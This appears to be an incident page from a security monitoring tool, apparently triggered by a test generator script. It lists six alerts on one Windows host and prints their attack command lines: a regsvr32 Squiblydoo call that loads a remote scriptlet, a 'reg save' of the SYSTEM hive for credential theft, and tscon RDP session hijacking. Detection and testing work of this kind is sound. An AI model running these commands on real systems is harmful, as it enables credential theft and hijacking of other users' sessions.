Back to list

Critical CINC-20251221-154885B2 new

Aggregate ID: aggind:561559e2fcea400ba3601b74d64aa30b:4327446486

Incident ID CINC-20251221-154885B2

Severity Critical (90)

Status new

Alert Count 6

Host Count 1

First Seen 2025-12-22 02:51:28

Last Seen 2025-12-22 02:52:43

Duration 0d 0h 1m

Created 2025-12-22 08:36

Updated 2026-01-13 15:14

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Severity	Status	Hostname	Description	Tactic	Command Line	Time
Informational	new	DESKTOP-FNUMV3U	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"python" mega_incident_generator.py --rounds 2 --interval 30	12-22 02:52
High	new	DESKTOP-FNUMV3U	A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line.	Defense Evasion	regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll	12-22 02:52
Critical	new	DESKTOP-FNUMV3U	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SYSTEM C:\Users\User\AppData\Local\Temp\system.hiv	12-22 02:52
High	new	DESKTOP-FNUMV3U	A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree.	Lateral Movement	C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0"	12-22 02:52
High	new	DESKTOP-FNUMV3U	A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree.	Lateral Movement	tscon 1 /dest:rdp-tcp#0	12-22 02:52
Informational	new	DESKTOP-FNUMV3U	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"python" mega_incident_generator.py --rounds 2 --interval 30	12-22 02:51